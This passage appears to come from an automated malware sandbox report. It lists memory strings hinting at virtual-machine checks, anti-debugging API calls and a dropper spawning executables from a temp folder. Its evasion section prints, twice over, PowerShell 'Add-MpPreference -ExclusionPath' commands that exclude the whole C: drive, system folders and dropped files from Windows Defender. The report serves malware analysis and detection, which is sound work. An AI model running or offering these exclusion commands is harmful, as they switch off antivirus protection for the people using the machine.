                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vamd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.19041.1_none_a7bb53746630ebd3
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RMicrosoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.19041.1682.cat
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66.manifest
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.19041.1_en-us_c2edb07518552135-
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.cat
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iamd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.19041.928_en-us_4257e8c2720c2e68.manifestt
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kamd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.19041.1_none_2246f2e6f0441379.manifestD
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2d.manifest{
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NMicrosoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
                                Source: wscript.exe, 00000004.00000003.2267299393.00000000028EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\+
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kamd64_microsoft-hyper-v-h..r-merged-deployment_31bf3856ad364e35_10.0.19041.1_none_479626a02c4fee1b.manifest{
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [amd64_microsoft-hyper-v-vstack_31bf3856ad364e35_10.0.19041.1_none_1aae8085937aee95.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.19041.1_en-us_d314f4eb3925c8b5.manifest
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.mum
                                Source: Everything.exe, 00000014.00000003.2331201128.0000000005D51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.1_none_97e0d8d7edeea164u~
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jamd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_50c23e4c771f203a.manifest
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bamd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RMicrosoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.19041.1682.mum
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kamd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kamd64_microsoft-hyper-v-m..ients-firewallrules_31bf3856ad364e35_10.0.19041.1_none_a0e7047dc07f4f53.manifesta
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.19041.1_en-gb_71570953289cd4d0
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Microsoft-Hyper-V-Offline-Common-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1566.cat
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _Microsoft-Hyper-V-Offline-Core-Group-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.mumw
                                Source: Everything.exe, 00000014.00000003.2336839781.00000000052E1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V.ps1$
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: namd64_microsoft-hyper-v-o..p-merged-deployment_31bf3856ad364e35_10.0.19041.1741_none_27157646a7f74243.manifest
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aamd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aamd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.19041.928_none_58e4b5397f9ab13a.manifestQ
                                Source: Everything.exe, 00000014.00000003.2336839781.00000000052E1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Manager.lnk
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Zamd64_microsoft-hyper-v-vmbus_31bf3856ad364e35_10.0.19041.1_none_8d60e49d6e4b7e60.manifestq
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: damd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]Microsoft-Hyper-V-Offline-Common-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mumx
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: XMicrosoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmdebug.dll.mui
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_en-gb_165edb2e5d580618.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-m..wallrules.resources_31bf3856ad364e35_10.0.19041.1_en-us_90826ff4620798e4.manifestlV
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: namd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580.manifest
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bamd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.19041.1_en-us_369e8b635061fdb3
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.19041.1_en-us_b3d1ef0d088d6955.
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Samd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeAPI call chain: ExitProcess graph end nodegraph_2-25162
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeAPI call chain: ExitProcess graph end nodegraph_3-3490
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information queried: ProcessInformation
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00CDF838
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D61DDE0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00007FF63D61DDE0
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CE7DEE mov eax, dword ptr fs:[00000030h]2_2_00CE7DEE
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CEC030 GetProcessHeap,2_2_00CEC030
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00CDF838
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDF9D5 SetUnhandledExceptionFilter,2_2_00CDF9D5
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00CDFBCA
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00CE8EBD
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D61B0B0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF63D61B0B0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D618FB0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF63D618FB0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D61B150 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF63D61B150
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728D5B150 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF728D5B150
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728D58FB0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF728D58FB0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728D5B0B0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF728D5B0B0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728D5B150 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF728D5B150
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728D58FB0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF728D58FB0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728D5B0B0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF728D5B0B0
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\apppatch\CustomSDB\sihost.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\apppatch\CustomSDB\sihost.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe'
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess created: C:\Users\user\AppData\Local\Temp\sqls211.exe "C:\Users\user\AppData\Local\Temp\sqls211.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess created: C:\Users\user\AppData\Local\Temp\drivEn760.exe "C:\Users\user\AppData\Local\Temp\drivEn760.exe" Jump to behavior
